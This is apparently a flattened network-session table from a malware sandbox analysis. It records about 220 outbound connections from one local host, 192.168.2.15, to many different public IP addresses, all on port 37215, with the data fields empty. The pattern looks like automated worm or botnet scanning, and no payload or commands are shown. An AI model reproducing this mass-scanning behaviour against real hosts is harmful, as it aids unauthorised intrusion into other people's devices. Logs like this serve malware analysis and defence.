                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16428192.168.2.1542520156.8.173.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16429192.168.2.1543152197.17.29.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16430192.168.2.1537218122.93.202.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16431192.168.2.1549356181.62.1.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16432192.168.2.1534062138.62.163.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16433192.168.2.1544182122.235.48.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16434192.168.2.153409241.48.128.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16435192.168.2.1533524157.222.240.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16436192.168.2.1542560222.0.253.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16437192.168.2.154364245.126.74.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16438192.168.2.1550856190.116.239.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16439192.168.2.1552642197.78.120.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16440192.168.2.1538220181.108.2.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16441192.168.2.1550648222.68.215.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16442192.168.2.1555492157.156.200.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16443192.168.2.1553830156.231.230.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16444192.168.2.155020645.88.166.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16445192.168.2.1540736157.24.161.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16446192.168.2.155474831.220.198.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16447192.168.2.153920694.197.52.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16448192.168.2.1549796102.144.203.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16449192.168.2.1546036186.81.201.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16450192.168.2.155356237.102.167.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16451192.168.2.153843237.6.165.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16452192.168.2.1553992102.12.53.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16453192.168.2.153741094.126.37.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16454192.168.2.1555870157.130.90.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16455192.168.2.153847237.19.138.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16456192.168.2.1537964190.234.175.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16457192.168.2.155908018.223.80.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16458192.168.2.155952241.191.194.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16459192.168.2.1539596138.106.147.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16460192.168.2.154516437.203.65.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16461192.168.2.1560780190.6.210.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16462192.168.2.155965831.222.115.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16463192.168.2.1535580122.192.189.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16464192.168.2.1556082157.231.211.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16465192.168.2.155490037.248.79.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16466192.168.2.155754031.224.190.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16467192.168.2.1545006190.200.115.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16468192.168.2.1551162186.207.35.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16469192.168.2.153353294.211.152.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16470192.168.2.1538950186.199.125.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16471192.168.2.1553126157.206.115.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16472192.168.2.154800245.170.26.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16473192.168.2.1545018222.27.136.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16474192.168.2.155850085.197.235.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16475192.168.2.1558076102.75.107.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16476192.168.2.154825094.105.168.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16477192.168.2.1534760102.62.136.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16478192.168.2.1540998102.223.197.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16479192.168.2.1542936186.97.248.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16480192.168.2.1543458222.20.40.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16481192.168.2.1558104156.93.173.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16482192.168.2.155788045.80.130.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16483192.168.2.1555474122.197.175.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16484192.168.2.15559968.186.57.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16485192.168.2.1536534121.199.239.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16486192.168.2.1555974222.225.10.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16487192.168.2.1534582121.65.140.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16488192.168.2.1550088102.193.241.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16489192.168.2.155829494.152.216.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16490192.168.2.1536996138.186.123.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16491192.168.2.1545418138.23.81.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16492192.168.2.1552382222.239.255.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16493192.168.2.153297031.32.89.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16494192.168.2.1545610102.30.147.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16495192.168.2.155390845.208.108.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16496192.168.2.153330694.227.105.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16497192.168.2.1551000121.195.232.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16498192.168.2.1539552156.74.2.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16499192.168.2.1536522102.235.134.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16500192.168.2.155605252.78.123.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16501192.168.2.154041031.115.230.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16502192.168.2.1556704181.64.170.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16503192.168.2.1557478122.83.50.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16504192.168.2.1541732138.228.148.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16505192.168.2.1560232103.64.76.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16506192.168.2.1547184122.173.135.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16507192.168.2.154592694.220.219.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16508192.168.2.153841037.49.104.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16509192.168.2.155311437.15.96.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16510192.168.2.153338045.46.23.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16511192.168.2.154044837.231.216.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16512192.168.2.1557040222.15.117.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16513192.168.2.1540308122.135.153.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16514192.168.2.1537824121.154.155.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16515192.168.2.153287831.248.69.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16516192.168.2.1551542197.78.249.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16517192.168.2.1540174197.180.128.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16518192.168.2.1536888122.77.193.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16519192.168.2.1555968212.71.17.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16520192.168.2.1545200181.46.149.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16521192.168.2.154291694.114.198.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16522192.168.2.1560308190.112.166.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16523192.168.2.1560210156.111.3.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16524192.168.2.1535864138.54.94.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16525192.168.2.1536332181.62.166.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16526192.168.2.1536506186.56.245.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16527192.168.2.154363637.76.101.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16528192.168.2.1550792186.147.211.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16529192.168.2.1541292157.246.52.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16530192.168.2.1552940190.230.54.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16531192.168.2.156021441.133.233.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16532192.168.2.153351237.231.241.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16533192.168.2.1551280222.222.116.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16534192.168.2.1553432102.166.161.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16535192.168.2.1558860121.139.210.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16536192.168.2.155455894.114.36.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16537192.168.2.155279894.139.90.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16538192.168.2.1557042197.139.141.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16539192.168.2.1536852197.159.211.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16540192.168.2.1543232122.255.191.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16541192.168.2.1549786197.185.153.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16542192.168.2.1546738156.46.191.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16543192.168.2.1541892102.5.104.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16544192.168.2.1535898102.18.122.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16545192.168.2.154246237.69.29.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16546192.168.2.1551016156.146.222.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16547192.168.2.1538650210.224.5.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16548192.168.2.1546188190.156.117.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16549192.168.2.155286845.65.13.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16550192.168.2.1553650222.245.123.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16551192.168.2.155852441.46.10.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16552192.168.2.1544696122.66.42.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16553192.168.2.1535188190.189.86.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16554192.168.2.1555632156.163.36.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16555192.168.2.155921045.80.87.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16556192.168.2.154410231.63.217.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16557192.168.2.1533290186.94.166.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16558192.168.2.155677445.99.166.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16559192.168.2.1557048138.228.58.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16560192.168.2.1552400110.201.48.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16561192.168.2.155182094.89.194.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16562192.168.2.156063231.76.6.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16563192.168.2.1537224222.107.55.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16564192.168.2.1542758222.98.126.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16565192.168.2.1550776121.27.27.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16566192.168.2.1536334197.95.56.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16567192.168.2.154159831.18.141.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16568192.168.2.1554368181.242.174.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16569192.168.2.155313845.13.250.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16570192.168.2.1536464222.162.71.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16571192.168.2.1535622121.91.93.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16572192.168.2.155324431.167.169.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16573192.168.2.153654694.196.68.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16574192.168.2.155251294.209.49.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16575192.168.2.1540518121.213.27.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16576192.168.2.1542498122.128.89.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16577192.168.2.1557732156.103.228.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16578192.168.2.155018094.84.194.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16579192.168.2.1551212121.208.14.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16580192.168.2.1537936197.110.113.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16581192.168.2.1532828121.217.189.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16582192.168.2.155103245.242.128.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16583192.168.2.1557000197.92.249.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16584192.168.2.153329294.3.197.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16585192.168.2.1535118222.41.90.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16586192.168.2.155612241.87.105.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16587192.168.2.1547430121.149.12.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16588192.168.2.1548582121.155.184.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16589192.168.2.1546022186.163.167.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16590192.168.2.1555450190.197.53.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16591192.168.2.154077041.161.33.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16592192.168.2.1556516181.98.207.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16593192.168.2.154225045.98.25.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16594192.168.2.1541430138.118.110.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16595192.168.2.1535460181.249.177.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16596192.168.2.153404041.71.246.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16597192.168.2.1536070102.42.166.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16598192.168.2.155552645.66.201.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16599192.168.2.154076831.11.112.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16600192.168.2.1559068156.93.130.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16601192.168.2.153672841.112.59.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16602192.168.2.154909245.213.132.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16603192.168.2.1545918102.173.105.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16604192.168.2.154670494.46.65.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16605192.168.2.1539624102.142.16.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16606192.168.2.1539216138.129.58.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16607192.168.2.153781845.100.239.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16608192.168.2.1544390102.253.66.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16609192.168.2.153569894.231.45.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16610192.168.2.155228037.81.204.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16611192.168.2.154060437.124.207.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16612192.168.2.1549582138.212.116.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16613192.168.2.1552928197.98.21.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16614192.168.2.155320631.162.141.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16615192.168.2.1544782222.204.244.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16616192.168.2.1542650157.157.27.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16617192.168.2.154152294.83.145.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16618192.168.2.1559878156.149.147.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16619192.168.2.1550744181.31.185.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16620192.168.2.1543876138.143.123.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16621192.168.2.156061237.123.141.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16622192.168.2.1548380186.104.224.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16623192.168.2.1555452156.193.162.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16624192.168.2.153860845.231.133.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16625192.168.2.1548938197.106.249.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16626192.168.2.153515245.164.31.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16627192.168.2.1549398181.161.206.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16628192.168.2.154279094.53.29.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16629192.168.2.1550754156.157.235.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16630192.168.2.1558338197.104.141.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16631192.168.2.154553831.7.136.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16632192.168.2.1533624102.124.39.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16633192.168.2.1553346102.174.13.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16634192.168.2.1553984121.168.151.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16635192.168.2.15388545.60.75.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16636192.168.2.1538596138.159.52.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16637192.168.2.1538530197.239.201.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16638192.168.2.1542286190.149.212.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16639192.168.2.1552780222.13.88.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16640192.168.2.155985245.123.122.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16641192.168.2.1534694190.68.158.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16642192.168.2.1554372102.138.72.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16643192.168.2.153816241.127.51.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16644192.168.2.155368094.130.151.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16645192.168.2.1540542181.140.140.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
